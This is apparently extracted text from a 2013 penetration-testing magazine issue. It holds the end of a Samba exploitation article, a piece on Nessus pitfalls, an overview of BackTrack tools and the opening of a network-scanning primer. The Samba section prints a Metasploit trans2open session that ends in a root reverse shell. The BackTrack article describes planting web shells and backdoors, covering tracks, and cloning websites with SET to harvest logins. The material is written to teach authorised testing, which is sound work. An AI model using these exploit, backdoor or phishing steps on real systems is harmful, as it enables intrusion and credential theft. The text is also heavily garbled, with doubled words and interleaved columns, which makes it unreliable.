[3] OSSTMM Methodology – http://www.isecom.org/mirror/ OSSTMM.3.pdf [4] ISSAF Methodology – http://www.oissg.org/files/issaf0.2.1.pdf [12] CVEDetails, samba related search results – http://www.cvedetails.com/vulnerability-list/vendor_id-102/product_id-171/ [5] OWASP Methodology – http://www.owasp.org/images/5/56/ OWASP_Testing_Guide_v3.pdf [6] PuTTY – http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
version_id-9501/Samba-Samba-2.2.1a.html [13] [13] Metasploit fr amework – http://www.metasploit.com/
Listing 7. metasploit session output
mands to obtain a remote privileged ac-
$ msfconsole
the metasploit session output. During a rveal penetration test you should verify whether all the vulnerabilities identified are exploitable or not. It's not sufficient to stop the penetration test on the first identified vulnerability. If the presented scenario was a real one, I should have also tested possible vulnerabilities affecting http, ssh and all other identified services. Moreover, once you "breach" the security measures it is time to identify the relations between the vulnerable system and other systems interacting with it.
cess on the target system. Listing 7 shows
=[ metasploit v4 .6.0 =[ metasploit 6.0-dev [core:4. core:4 .6 api:1. api:1 .0] + -- --=[ 1045 1045 exploits exploits - 589 589 auxiliary auxiliary - 174 174 post post + -- --=[ 274 274 payloads payloads - 28 28 encoders encoders - 8 nops msf > use exploit/ exploit /linux/ linux/samba/ samba /trans2open msf exploit( exploit (trans2open) trans2open ) > show options Module options (exploit/ exploit /linux/ linux /samba/ samba/trans2open) trans2open ):
Name ---RHOST RPORT
Current Setting --------------139
Required Description -------- ----------yes The target address yes The target port
Conclusion What I tried to show you in this article is that, in order to become a professional penetration tester, you need to under-
Exploit target: Id -0
stand how to work to meet business and industry needs. This article quickly covers
Name ---Samba 2.2 2.2. .x - Bruteforce
techniques and methodologies that are
the subject of whole books, however my msf exploit( exploit (trans2open) trans2open ) > set RHOST 192.168 192.168. .1.105 RHOST => 192.168 192.168. .1.105 msf exploit( exploit (trans2open) trans2open ) > exploit [*] Started reverse handler on 192.168 [*] Started 192.168. .1.107 1.107:4444 :4444 [*] Trying [*] Trying return return address address 0xbffffdfc 0xbffffdfc... ... [*] Trying [*] Trying return return address address 0xbffffcfc 0xbffffcfc... ... [*] Trying [*] Trying return return address address 0xbffffbfc 0xbffffbfc... ... [*] Trying [*] Trying return return address address 0xbffffafc 0xbffffafc... ... [*] Command [*] Command shell session 1 opened (192.168 192.168. .1.107 1.107:4444 :4444 -> 192.168 192.168. .1.105 1.105:32862 :32862) ) at 2013 2013-04 04-24 05 05:56:25 :56:25 +0200 id uid= uid=0(root) root ) gid= gid=0(root) root) groups= groups =99 99( (nobody) nobody )
StartKit 01/2013(01)
Page 18
goal with this is not trying to be exhaustive but to be a starting point to approach penetration testing as a profession.
FRANCESCO PERNA Computer enthusiast since childhood, has spent more than 15 years on o n the research resea rch of security issues related to applications and communication protocols, both from the offensive and defensive point of view. He is a partner and technical director of Quantum Leap s.r.l., a company that offers security services to companies and organizations. http://www.linkedin.com/in/francescoperna
[email protected] , www.quantumleap.it , www.quantumleap.it
http://pentestmag.com
Cyber attacks are on the rise.
So, you think your systems and networks are secure? secure? Think again – you’ve already been attacked and compromised. And, we should know know because we did it it in less than four hours. hours. Here’s Here’s the good news: news: we’re the good guys. We can tell you what we did and how we did it, so you’ll be prepared when the bad guys try it – and they will. We’ll show you how.
4
Combat cyber attacks
4 Mitigate
risk
4
Ensure resilience
4
Improve operational efficiency
Visit www.KnowledgeCG.com www.KnowledgeCG.com to learn how KCG’s KCG’s experienced, certifed cybersecurity professionals professional s help our government and commercial customers protect their cybersecurity programs programs by knowing the threat from the inside out.
Trr u s t e d C y b e r A d v i s o r T
PENTESTING WITH TOOLS
Pene enetrati tration on Tes Testi ting ng with Nessus The Continual Need for Trained Pentesters In the last 10 years, cybersecurity has become a household word, and due to the growth of critical infrastructure and an exponential increase in the related threat of cyber-attack, dominates every conversation conversation we have about securing this critical infrastructure.
T
his has resulted in increased customer demand for services; a growing market for cy bersecurity vendor products; and an expansion within higher education curriculums, including advanced degrees and certification programs within the cybersecurity field. The president of the United States has declared that the “cyber threat is one of the most serious economic and national security challenges we face as a nation”, and that “America's economic prosperity in
the 21st century will depend on cybersecurity”. This emphasis has significantly expanded investment in
cybersecurity, illustrated by the 2013 allocation of $769 million to the Department of Homeland Security for its cybersecurity initiatives and the request by
the Department of Defense for $3.2 billion by 2015. These expenditures on cybersecurity are part of a
projected $65.5 billion to be spent by the federal government between 2013 and 2018. Playing a critical role in this clearly growing in-
According Accordin g to the SANS Institute, Institu te, penetration penetra tion
testing is ranked as the second “coolest” job in the industry. industry. This enthusiasm has created a much
larger mainstream market flooded with tools for the aspiring penetration tester. There are a significant number of both free and commercial pen-
etration testing tools available on the market. The most popular of these tools and the most wide-
ly used by penetration testers of every skill level is the automated vulnerability scanner. There is a common misconception that penetration testing is simply running an automated vulnerability scanner and all the important vulnerabilities will be magically highlighted for the tester as a result. After that, it's a simple matter of determining determi ning the false positives and exploiting the ones that are
valid. To better examine this theory, we will take a look at one of the most popular vulnerability scanners currently in use today, Nessus ® (Tenable
Network Security, Inc.).
dustry is that of the penetration tester, also known as a pentester. The pentester is an individual constantly staying abreast of the newest exploits, security flaws, and tricks-of-the-trade. This role has created a special ized niche within the cybersecurity realm and has become a vital part of any security program and security assessment.
StartKit 01/2013(01)
Nessus Vulnerability Scanner Nessus, a vulnerability scanner created by Ten-
able Network Security, exists primarily as either a free, non-commercial version for home use or a professional version (with paid licenses for each
system it is used on). Version 5, the most recent version of Nessus, and version 4 are built on a
Page 20
http://pentestmag.com
server-client model, taking a built-in (and continually updated) series of more than 50,000 plug-ins (vulnerability and configuration checks) to deter mine any existing vulnerabilities or issues on a
set of specified targets and ports. It makes use of an HTML5 web interface for the client piece that allows easy configuration of the scan and can be used with the same functionality on Linux ® (Linus
Torvalds), Windows® (Microsoft Corporation), OSX ® (Apple Inc.), and mobile platforms. The server component runs the test and performs the actual vulnerability scan. It flags the high-risk findings with an ominous red color, moderate risk issues with a cautionary orange, and the most com-
become more of a point-and-click exercise to fill one more box on a security assessment checklist. At the end of the day, the tester will have run Nessus, used all the identified exploits that were highlighted; employed all the default and null passwords that were provided to access a wide variety of services and devices; and even examined the wealth of additional enumerated data that was outlined by the detailed report, complete with color priority codes, custom filters, and logically grouped targets by IP address. At the conclusion of testing,
the tester wraps up, unplugging from the network, and leaves confident, knowing that a thorough penetration test was conducted. The customer
mon low-risk occurrences with a muted blue color (considered informational).
feels reassured by knowing that, at a minimum, all
Each finding will not only have a rating and a fully detailed description of the issue, but the tester can also even check to see if an associated exploit exists, a corresponding common vulnerabilities and
fied and no systems were harmed in the making of
exposures (CVE) identifier and BugTraq number, if
see where things could possibly have been over-
one exists, for the tester to read further about the potential exploit. Nessus will go even further and
looked or gone askew.
point out an exploit framework to use (Metasploit® (Rapid7 LLC), Core Impact ® (Core SDI, Inc.), Immunity CANVAS™ (Immunity, Inc.), etc.) if there is one with a known workable exploit. Given this star tling wealth of automated analysis and reporting provided to the aspiring cybersecurity profession-
al, one could be led to think that the profession has
the important high-level threats have been identithis pentest. But that may not be the case... What could have possibly have been missed?
Let’s take a walk back through the above case and
Pre-game: Network mapping Prior to running the Nessus tool, a penetration tester has to first determine the target list that will be fed into the tool. What IP addresses are we scanning? Let's assume we ran the basic host discovery scan. Did we account for firewalls? Many start-
ing testers will run a network discovery scan once and faithfully record the IP addresses that were discovered. Did we accurately identify the operating system (OS) in the hopes of reducing the number of plug-ins run during the vulnerability scanning phase?
Ideally, testers will use a network mapping tool (Fyodor's Nmap and variants are a popular choice) to better define the target space. Were all 65,535 ports examined? By default, Nmap does not scan every port. On one particular engagement, a highlevel port (not found in the basic Nmap scan) con tained a running Bean Shell. Bean Shell is an environment with dynamically interpreted Java®
(Oracle America, Inc.) and scripting capability with powerful features, including a remotely accessible shell for debugging (or printing password hashes
from the server it is running on; Figure 1).
Figure 1. Redacted image of displaying the contents of a shadow file with cat via Bean Shell’s exec command
StartKit 01/2013(01)
Main Event: Running Nessus Rookie mistake? Maybe it would be easier to just skip any preliminary steps and use Nessus's builtin Transmission Control Protocol (TCP) scanner Page 21
http://pentestmag.com
PENTESTING WITH TOOLS instead? Problem averted! Let's take a moment
has low risk or "no risk" associated with the finding,
and see what else could go wrong. Is your host-based firewall up? That could greatly interfere with the validity of your scan, even resulting in the loss of some of the probes intended for your target. Are you using a virtual machine (VM) and running more than one operating sys-
that it's worthless. Developers tend to be pressed on schedule, which results in the casual saving of
tem at once? Are you using a Network Address Translation (NAT) configuration because the customer only had one usable IP address for you? Nessus as far back as Version 2 had known issues when it is run on a VM in NAT mode, even creating false negatives in some cases, causing
vulnerabilities to be overlooked. Nessus clearly documents potential issues and has addressed many in later versions, but many beginning security analysts may consider Nessus to be relative-
ly simple and overlook the importance of reading
files wherever it is quick and convenient to access them. Development teams may create temporary shares to more easily run tests and access other teammates’ scripts. What’s that? The labor-saving script that’s sitting on the share has admin credentials? This not only saves the developer time and
energy, but also the busy pentester (Figure 2). A host can potentially have a startling large number of shares open to the public (including the
dreaded C$ and Admin$) and still be listed as a risk factor of „none” (Figure 3). Nessus also identifies many directory traversal
issues as a low- or medium-risk finding (though it marks a number of others as high, depending on the plug-in).
through the guide.
At this point, the tester may think, "We can have the best of both worlds" and run Nmap functionality straight from Nessus. Nessus is configured to run each plug-in against one host. A special plugin is used to call Nmap functionality. If 20 hosts are scanned at once, 20 instances of Nmap will be run,
one against each host. This can quickly become a resource nightmare. One last consideration that can concern customers is whether safe checks are employed. Denial of service is one of those situations that no penetration tester wants to ever experience on a customer site or the associated repercussions for it occurring due to negligence, which can be severe.
After Party: Reading Through Nessus Results
Figure 2. Redacted configuration file with perl script settings, and database credentials accessible via unauthenticated web access
Assuming the previous steps were followed, the tester has hopefully managed to avoid all of the pitfalls of setting up and running the Nessus scanner.
However there's more to take into consideration. In a typical scenario, you have dutifully identified all the high-risk findings and some of the more inter -
esting medium-risk findings, but you are on a tight schedule and focused on additional important priorities. However, there remains hundreds of low-
risk findings and "less interesting" medium-risk findings that may have been ignored in the interest of time. There are names of potentially open file shares that are listed faithfully by Nessus, but generally do not come with a screaming red SECURITY HOLE attached to herald its existence. This is when it becomes vitally important to make the effort of avoid-
ing the common tendency of thinking just because it StartKit 01/2013(01)
Figure 3. A list of open server message block (SMB) shares identified by Nessus
Page 22
http://pentestmag.com
With directory traversal, one can pull configuration files, logs, /etc/password files (useful for de-
tools and scanners you do, but they also have even more expensive shiny tools that create bet-
termining user names) and a wealth of data from
ter-looking reports. The true value of pentesters, which makes the profession continually stand apart in the cybersecurity industry, is their know-
a target. Maybe those lower, less flashy findings aren’t so unimportant after all. Even the more attractive findings produced
by Nessus can result in overlooked issues. You look up the finding suggested by Nessus, and
ing how to properly use the tools that are available to them and an ability to manually analyze the security environment to see, in many cases, the gaps in security.
you realize you are running the suggested ex-
A pentester is able to look at custom, homegrown
ploit framework with all the most current plugins.
application code that does not have a published advisory and still thoroughly see the security issues in its entirety. Pentesters observe the application filters, security permissions, and firewall rules that often baffle automated tools and find ways
You triumphantly load up the exploit, set your payload, and fire away. However, there is a men-
tal checklist of questions you should have asked yourself beforehand, even when dealing with
low-risk exploits.
around them. Much like a martial artist who learns how to punch, kick, and block will still take years of
Did you check off of which port it was running?
practicing and training before gaining a true level of proficiency, a pentester can learn the a stepwise methodology, the syntax of a myriad of tools, and
• Is it possible a rewall is blocking the return port selected (e.g., default 4444 on Metasploit), and you record "patched?"
the
system
as
being
have bookmarks to every major security advisory site. It may still take years turning the learning of a craft into an art form.
• In haste, did you check the info data to see if a DoS was possible with the exploit we are running due to the version of OS running on the target system?
Conclusion The questions and concerns that have been addressed throughout this article are not profound secrets to the Art of Penetration Testing. However, leaving such issues unaddressed results in
How to Become a More Proficient Penetration Tester Despite the numerous considerations to take into account while testing, Nessus and other security tools still remain highly useful. They are meant to enhance or better facilitate a penetration test, but are not used in place of one. There are some basic principles that should be constantly in the mind of every penetration tester.
many of the common mistakes for which novice and even some more experienced pentesters are known. Common mistakes happen for a large variety of reasons. Testers who do not have the experience and training that is necessary and may tend to develop an overreliance on automated tools and accept on blind faith the settings configured out of the box and the data that results from them. Starting testers become so obsessed
by the “high-risk” findings (much like a shiny, red, blinking button) that they tend to turn their noses at the often-overlooked, lower-risk findings.
Learn the Tools Nessus alone has a wealth of other features (mobile device examination, payment card industry
(PCI) compliance, credentialed policy scans, and even the ability to create custom Nessus® Attack Scripting Language (Tenable Network Security, Inc.) plug-ins) that cannot possibly be covered in a short article. It has a user-friendly interface and intuitive policy creation options. This does not remove the need to learn what flaws or is-
sues the tool may have (every tool has them) or
What many do not stop to realize is that developers and companies are running the same automated tools that pentesters use. Patching and protecting against remote exploits have increased. Vendors incorporate the newest safeguards into their software. Unless the custom-
situations where another tool may be more useful. If one tool did it all, there would not be such a huge market of penetration testing tools. Experimenting at home or within a test lab to learn
er is tragically bereft of any security know-how,
so that others on your team do not have to learn the hard way.
odds are they not only run the same automated
StartKit 01/2013(01)
the quirks of any tool is highly advisable. Make notes of what works well and strange behavior
Page 23
http://pentestmag.com
PENTESTING WITH TOOLS Understand the Networking
References
Many of the issues described dealt more with the configuration of your testing computer, the configuration of VMware ® (VMware, Inc.), and the con -
•
•
"Cybersecurity | The White House." Web. 25 Mar. 2013. http://www.whitehouse.gov/cybersecurity Brownstein, Ronald. "Pentagon Seeks $3.2 Billion for Revised Cyber Budget – NationalJournal.com." NationalJournal.com. Web. 25 Mar. 2013. http://
figuration of the customer›s network perimeter. To use a network testing tool, knowledge of the network becomes vital. If Nessus or any other tools seem to be behaving oddly, start a network sniff er (e.g., Wireshark® (Wireshark Foundation, Inc.) and see what the activity looks like. Are the con-
sion of software means a new puzzle to unlock.
nections being made appropriately? Where in the
Learn from experience, share techniques, observe
process did things break down? If the tester does
forums, setup your own network and try out new
not realize what is going on «under the hood, «he or she may never realize what exactly is causing issues in the test.
things. Nessus has shown itself to be a versatile, powerful, and highly useful tool for the penetration tester.
www.nationaljournal.com/tech/pentagon-seeks3-2-billion-for-revised-cyber-budget-20110325 .
However, like any of the other hundreds of existing
Keep the Goal in Mind It is important to keep the goal of your test in mind (control the network, going after sensitive celebrity accounts, or preventing the system from declar-
ing thermonuclear war). It differs from customer to
security tools, it does not in any way replace the penetration tester. Instead, it helps make the process of testing smoother, faster, and often easier so that the penetration tester is better able to do the job.
customer. Do they want a simple compliance scan so they can point and say they remediated all the
"high-risk" findings? If the customer really wants to know that their information is safe, it will help for the tester to take the time to learn what they most want to protect. Hunting after high-risk find ings can be pointless if they were all on a development box that is on its own, segregated subnet,
unreachable by the rest of the network that will be turned off next week. An open share that happens to reside on a development version of the main database server ultimately allows one to not only compromise the database, but also the underlying OS. This could easily lead to captured password hashes and the compromise of several other serv-
ers on the network.
Learn the Customer Each new test is a new experience; see how a par-
ticular network is deployed. Learn the standard procedures for each particular client. Many organizations have their own naming and coding conventions for their applications. Developers share source code. Password naming conventions by
the help desk seem to follow the same patterns. Customize the test to fit the current target site.
Be Creative Penetration testing largely involves thinking "outside the box." A tester is learning a series of rules and configurations and then obligingly getting around them. Each new security measure and v er-
StartKit 01/2013(01)
DAN ROBEL, CISSP, GCIH, GPEN Dan Robel is a senior cyber penetration testing specialist at SAIC. With over 10 years of information security experience, he serves as a penetration test team lead and a course instructor for SAIC within the Washington, D.C. area. He has guest lectured on cyber warfare at the Air Force Institute of Technology. Robel offers his penetration test expertise as a “red team” member for SAIC’s CyberNEXS, a patented cybersecurity training and exercise platform, during the Air Force Association’s CyberPatriot national high school cyber defense competition and the Maryland Cyber Challenge. Robel earned a Bachelor of Science in business and computer science from Mount Saint Mary’s and a Master of Science in knowledge and information management with a concentration in information security from George Washington University. His master’s thesis "International CyberCrime Treaty" was adapted as an honors white paper for the SANS Institute.
Page 24
http://pentestmag.com
PENTESTING WITH TOOLS
BackTrack for Pentesting? There is always a major struggle between the open source camp and the proprietary developed tool camp when it comes to the value of software and the impact and usability it has. And when it comes to security and testing software, these arguments are repeated over and over again.
T
he fact however remains that the guys and
for business use outside of realm of tinkering. The
girls that seek to penetrate your network are not picky. That can put them at an advantage when it comes to the vectors of attack they identify. If you or your company looks at a specific
type of person entering into the world of pentesting
philosophy when it comes to security, it is almost
to climb for the regular user. But even this class of individual is more than likely appointed on contract, it is sometimes not worth spending the time and effort to get something worth while configured. Especially if you need to earn your way in life, and each hour spent on something that should be trivial (like installing a small piece of software) becomes a chore.
certain that the hacking world in general will also look at other exploits and methods of exploiting. For this, Einstein is to be taken literally on his word when he said, “If you invent something that is foolproof, the world will invent a better fool”. When it comes to open source tools, the internet is riddled with solutions for each and every thing you might want. And because of the nature of social and community developed software, the minds it sometimes attracts are the brightest the world has to offer. Thus, the quality of tool you can find is nothing short of “bleeding edge” and is usually the first when it comes to new ideas and philosophies.
is usually such a person. He/she/they know their way around computers and compiling source from
scratch to get a tool to work is not such a mountain
Enter the good folks at project that produces tools like BackTrack. The guys and girls of the BackTrack community spend their time on getting all the most important tools, getting it running in “ready to use”/”out of the box” solution. No longer
does it take forever to hunt down the correct tool
But as with the bulk of open source tools you can
and get it to run in whatever environment you have
find, the developer focus is the core of the problem, and the fringe lying modules receive little, if any, at-
already running. The task has become as easy as
tention. This makes open source tools notoriously
a virtual space, live from a USB stick or boot from the DVD. All the key tools are there. All you need
difficult to configure and get to perform “as advertised”. Everything is possible for those selected few
with the inherit knowledge and skill to tinker. And even if there is a large community behind these tools, It is difficult for these tools to be deployed
StartKit 01/2013(01)
downloading the image, and running it from either
to do is find the tool that suites your needs, and learn how to use it. And in most cases, there is more than one almost similar tool configured in-
side backtrack, for your convenience.
Page 26
http://pentestmag.com
Even though the purists among us will still prefer to configure and maintain their own implemen-
tation of the selected tools, BackTrack makes it easy to get started, and should not in any way be seen as sub par to bit for bit compiled and file for file configured tools. Far from it! The mindset of
the hacker is not how pure your configuration is, or who did the best job of configuring the tool that will allow for the exploit of a system. As long as the goal is achieved, the tool was worth using. And the core focus of a professional pentester is to put him/
herself in the same mind as a hacker, and find the vulnerabilities in servers and systems before anyone else does. With the tool in hand, and the base understanding of what is required to be found, you can now set forth and start your testing on system and applications. Ethics plays a large roll to distinguish between
ing information like this (and sometimes striking gold in the sense of user-names and passwords) is what social engineering is all about. Rather work smart than too hard.
BackTrack is a fully functional operating system with web browsers included. No need to search Google from your primary OS, and then having to
write your notes before starting BackTrack, you can do all the work from this environment. For gathering technical information, BackTrack's Firefox browser has a number of tools installed to allow you to find information on the pages you browse. Scripts will be shown and you will be notified if something odd is used on the website you
are looking at before you even start scanning. As a further step BackTrack allows you to browse the site through a security proxy, which will passively investigate your target while you browse. This is ideal for investigating without alarms going
hacker and pentester. The difference is not in skill,
off at the client's side while you are looking at the
but in the way access to systems is disclosed. A
site or system in more detail than is initially disclosed. For this, look into BURP SUITE and OWASPZAP . Both run locally on BackTrack, allowing you to point your browser to them and browse the sites you need to investigate. On the application interface, you will find more information than you would ever believe is possible. Scanning the system: The first technical step in hacking is to scan the target machine(s) to under -
hacker will do this as a sport; a cracker will do it for self gain (the two descriptions are different, but usually used interchangeably by the media and
Hollywood), where as a pentester will do all this above board, getting the permission of the company or person the test is done against before starting the process of information gathering and exploitation. And then also, at the end of it all, the pentester will disclose all exploits found, putting the focus squarely on assistance in the rectification of security issues, rather than maintaining access to these systems for future and personal use. It can be seen as a moral gray area, but trust and an internal ethical drive has to govern the pentester to do what is right. In short, pentesters as seen
as white hat hackers with a piece of paper allowing them to hack. If you don't know this already, hacking is quantified in 5 stages when it comes to the education of pentesters. These stages are: (1) information gathering, (2) system scanning, (3) gaining access to a system, (4) maintaining access to the exploited system, and (5) covering your tracks ensuring your actions go unnoticed. For each of these stag-
es, BackTrack has a set of tools assisting you in getting the correct information to reach your goal.
Information gathering: Because cracking passwords and finding back doors into systems is a time consuming and sometimes impossible task, life for a hacker becomes much easier if he/she knows how a system works, and even more so if user-names and passwords are known. Gather StartKit 01/2013(01)
stand where the "attack" can be launched. Having a list of open ports will give you an idea of services that are running. Corporates will very seldom run services on weird ports because of standardization and, in most cases, compatibility between different servers and systems. The tool of choice here is NMAP. It is also seen as the industry standard, and a large number of tools, open source and proprietary, uses it as base to find the initial information on a system before making the decision further of which vector or at-
tack to try and exploit. NMAP in an active scanning tool, and if not used wisely will alert knowledgeable network and system administrators of your actions. NMAP comes in many flavours and even a number of graphical user interfaces. The most common of these is ZENMAP as installed on Back-
Track. The features are the same, but are easy to access without learning command line parameters for each of the features.
Deciding which vectors of attack will be used, NMAP (or its derivatives) will show you the open ports on the system. Each of these ports is a po-
Page 27
http://pentestmag.com
PENTESTING WITH TOOLS tential vector of attack. And for each of the tools/ services running on these ports, BackTrack has a tool to exploit or investigate further. The primary focus however for the pentester will be the website or web system running on the server. And depending on the mandate, the focus for infor-
A vast majority of the attacks on domains however occur via sql injection on the website. BackTrack comes installed with Sqlmap, Scans done with sqlmap can bet refined to scan of an operating system version with the –os=linux modifier as well as set to scan for a specific type of database such
mation scanning will be on port 80, 443 and 8080; the default open ports for web servers to run on. Tools such as the Harvester are used as to check
social media sites like linkedin and search engines for any email accounts linked to the domain you are trying to access. Results can be refined by putting
result limits on the scan. A similar tool on Backtrack is websecurify the results will inform you of server versions that are being displayed. Removing the version numbers from being displayed will assist you in hardening the server against scans for ver-
sions by possible attackers (Figure 1 and Figure 2). Another popular tool is the Joomscan tool that checks a web-server for the version of joomla in stalled and the various vulnerabilities associated with the plug-ins and modules installed on the website. The results are categorised into low,medium
and high risk problems. Joomscan allows you to quickly identify the key problems in the site. Figure 3. Joomscan with Scan options
Figure 1. Websecurify Web-testing tool
Figure 2. Websecurify scan log output StartKit 01/2013(01)
Figure 4. Sqlmap tool scan options
Page 28
http://pentestmag.com
as MYSQL, SQL etc with the –dbms=MYSQL modifier on your scan, the level of the scan can be set to run a more intense scan on the account if the initial scan does not reveal any errors (Figure 4 and For every piece of software introduced to a system, bad code can open up the system for exploit. Web applications and websites is not exception.
ly for the world 2 most used content management systems: Word Press and Joomla!. Identifying these systems and then running a scan is very easy using these tools. And because of the expand-ability of both these systems, old versions can be seen as very unsecure resulting in easy exploitable vulnerabilities. Exploiting the system to gain access: The sport
They are the primary focus for hackers because
in hacking is to gain access to a system that you
they are the most visible, and usually the part introduced on a server (be it Windows, Linux or any
target. All the information you have gathered will assist you in achieving this ultimate goal. Sometimes it is as easy as using a found user-name and password, and from there exploring and seeing if you can escalate yourself to the highest level of rights on a system. Sometimes none of the information you gathered is valid, and then it becomes
Figure 5).
other UNIX environment) that are not tested for all eventualities before it goes live.
Web testing is made easy with BackTrack. An industry standard tool included is W3AF (Web Application Attack and Audit Framework). This is not only a command line tool, but has a graphical interface as well making the use of the system easy. The results are given in report format as well as usable
interface form allowing the knowable to do exploits directly from the GUI (Figure 6 and Figure 7). Additional tools already included in BackTrack is WPSCAN and JOOMSCAN that is build specifical-
a technical game to see the hack through. Access to a system can result in a number of things that can be done. Defacing a website to make a political statement (in the realm of crack -
ing) or leaving a hidden note for other hackers to find (the sport of hacking) may seem like the ultimate, but it is only the most visible of Internet pen-
etration and hacking. Hidden away from the public eye (databases or data capsulated in confidential Figure 5. Sqlmap example scan query
files) is where the elite hacker plays. For this, the best-known automated tool is METASPLOIT. This tool is installed and ready to
be used in BackTrack. BackTrack also includes a graphical interface to METASPLOIT called ARMATIGE. Yet again, the command line options are
represented via a mouse click interface, and make
Figure 6. W3af graphical user interface startup screen
the multi scan of multi hosts easier than the time consuming typing of each host into the interface. This, however, is still available for those pesky exploits that need fine tuning. METASPLOIT is a compilation of tools and scripts
(especially scripts) for known exploits for different sets of tools running on servers. This span to all commonly used operating systems used as serv-
ers, and even exploits for desktop class operating systems. The advantage of using METASPLOIT is that exploitation does not stay theory. If it can exploit vulnerability, it will, and you get presented with the
terminal to further your hack. METASPLOIT is not the only exploitation tool
included in BackTrack. For a number of specific
Figure 7. W3af OWASP_TOP10 Scan against domain.com
StartKit 01/2013(01)
tools, there are specific exploits targeting those systems only. CISCO is a major target with the CISCO-GLOBAL-EXPLOITER already installed and configured on BackTrack. As is MySQL, MS SQL and ORACLE tools. But for a pentester, the Page 29
http://pentestmag.com
PENTESTING WITH TOOLS most important will be the SQLMAP tool, allowing easy exploit of SQL injection points found by
W3AF, WPSCAN and JOOMSCAN. Another angle of attack on web system or servers is to do an all to well-publicized brute force attack. For this, tools like HYDRA and its graphical inter face, HYDRA-GTK exists (Figure 8 and Figure 9). The art of brute force attacks is firstly in the user-names you have harvested in the first stage of
your attacks. Not knowing what user-name to use is just so crippling as not having the password. A successful brute force usually results in a username and password combination, and is not just
a focus on one of the two. If you can take one of these out of the equation, time needed for the at-
tack can be halved. Thus, find the way user-names are assigned if you can. Is it only first names, or is it last name and then first letter for fist name? Or is it an email address? What of these did you get while you gathered information? Passwords and the user of passwords is an art all on it's own. With the focus so squarely put on
password strength by social networks, everyone is getting use to using password that is not simply a dictionary password. This however makes life difficult, but not com-
pletely useless to try. Take a look at tools like JACK THE RIPPER as it is installed on BackTrack. For a good dictionary, scour Google for a word list in the language the site is in you are targeting. Maintaining access: Usually before this phase, a pentester's work is done. The task was to find exploitable holes in system and put attention on them for the client to fix. When you start entering the realm of maintaining access to an exploited system, ethics has to guide you. This too shall be dis-
closed to the client. Adding a backdoor script on a system can allow others to use that for easy exFigure 8. Hydra-GTK target settings
ploitation, making you liable. But, for these backdoor type of access after a hack, BackTrack supply a number of tools as well. If you have used METASPLOIT, it can generate a
backdoor type of application for a system allowing METASPLOIT to find that system every time you test it. If the web system or site fell under your hack -
ing charms, BackTrack include a number of web shells for each of the major used web development languages. You can upload the selected script via the exploit you have performed, allowing you to
quickly and easily access the system back-end the next time you need to without having to go through
the entire process again of the hack. Stored usernames and password can change, but a backdoor you control into a system is under your control as long as it is not found and removed by either the
administrator or another hacker. Covering you tracks: Whenever you access as
Figure 9. Hydra-GTK username and password setup
StartKit 01/2013(01)
system, there are tools to log your actions. Even if it is just browsing the website, your IP and what you have requested is logged. This is why passive scanning is ideal when trying to find informa-
Page 30
http://pentestmag.com
tion without arousing suspicion. Active scans can
start a web server on BackTrack as well without
trigger security notifications when not taking care. These can range from active protection, which will block you immediately, stopping your hack at-
the need for you to go through the effort of web server configuration or page development. And by simply fooling the targeted people to pass by
tempts in its tracks, to reactive security measures
your BackTrack's SET web server, you can harvest
resulting in legal action and subpoenas being issued for access logs and even seizing your equipment. Thus the importance of obtaining that most important document giving you the right to test before doing so. If all else fails, BackTrack include social engineering tools as well. The most used of these is
the credential you need to further your attempts to
SET. With this tool, you can make BackTrack act and look like a legitimate website. An unsuspecting user must be lured here by any means necessary, and while not suspecting foul play, will log in, giving you the credentials. The user will then be redi-
rected to the legitimate site, thinking he/she might have type something wrong.
To do this by hand can take some time. The site and icon need to be replicated. And then hosted on a web server. This site will then have to be altered in such a way as to reflect the typed in characters somewhere so you can harvest it. SET allows you to do all this in a few simple steps. It will pull down the site and replicate it down to a T, and then update it so that input fields will be harvested
by BackTrack and displayed on the screen. It will
hack the system (Figure 10). This social engineering method might not be in the spirit of the pentest, and more in the realm of pure hacking, but is a method non the less to obtain access to system. It all depends on your mandate as a pentester. A final note: BackTrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits on systems. So much so that is also includes pure hacking tools that are outside the realm of testing and
fringing on pure hacking. But it also allows the socalled "script kiddies access to professional tools that is so easy to use that they can exploit systems without understanding what has been achieved. Thus, use BackTrack as a tool to go for pentest ing. And use it as the tool to test basics, because
others will. But also see BackTrack as a tool, and understand what you are looking at when investigating system for security vulnerabilities. It does
put you on the right track. And applying what you have seen as results out of BackTrack will put you on the right track to security, or assisting in the security of an environment. BackTrack is vast, and so is the underlying knowledge that drive the included tools. And only by exercise and the self-motivation to learn and understand can it be of value to you and your client.
LLOYD WILKE
Figure 10. SET Start page with scan types
StartKit 01/2013(01)
Lloyd Wilke is the Director of Webstyles Internet Solutions. He's in charge of Webstyles Client Relations and Product Support. Lloyd has launched several successful hosting and backup solutions and new client website penetration testing division. This has provided a platform for our clients to expand their business presence with minimal cost and get maximum exposure. Webstyles Internet Solutions which was started in 2007, Offering web hosting as the main service, this has increased over time to offer online backups and website pentesting. WebStyles entered into an agreement with Starship Systems ( www.starshipsystems.com ) to extend and complete its security offerings to the market. In addition to security services, WebStyles now also offer the training and sharing of knowledge on practical business security.
Page 31
http://pentestmag.com
PENTESTING WITH TOOLS
Network Scanning: The Basic Tools Scanning is one of the first steps to obtain information about a network, services and hosts. While there are numerous tools, most of them fail to do a complete explanation on what is going “under the hood”. This article will try to explain the basic techniques used under the hood of great scanners such as nmap and so forth.
T
his will allow the reader to have not only a
better understanding of how the network scanners work on the discovery phase, but
also be able to implement their own scanners or use other programs to gather this information in the case nmap or other tools would trigger IDS signatures and the engagement requires not being
Scanning is one of the rst steps enabling to obtain valuable information about the network. Scanning is the most used and most detected part of an attack since it gives the attacker vital information, such as: machines that are reachable, services each machine has turned on or is offer-
ing to the reach of the attacker.
caught by it (Red Team).
Scanning is often underrated and is not real-
ly taken care of properly, scanning is an art and should be taken accordingly, there are basic and
A Good Scan is as Good as Half of the Penetration on the Machine You sit down and connect to the network, you get connected and have access, you smile verifying that all the tools are updated, get the notes ready, encrypted directory and fire up the nmap scanner.
advanced techniques some of which will be covered within this article. Some introduction into TCP/IP and UDP will be
covered to give background on the techniques covered.
The client wants a full detailed report and packet dump for further analysis by their forensic team, so you turn on tcpdump and let it record. The client
TCP/IP
approaches and the conversation goes like this:
name) is a transfer protocol (I’m sure the name gave it away); the name TCP/IP refers to an entire
• “So how is the engagement going? Any prob-
suit of data communication protocols; the name comes from adding the Transfer Control Protocol and the Internet Protocol. TCP is a connection-oriented protocol. Whenever a packet arrives, it gets checked and an ac-
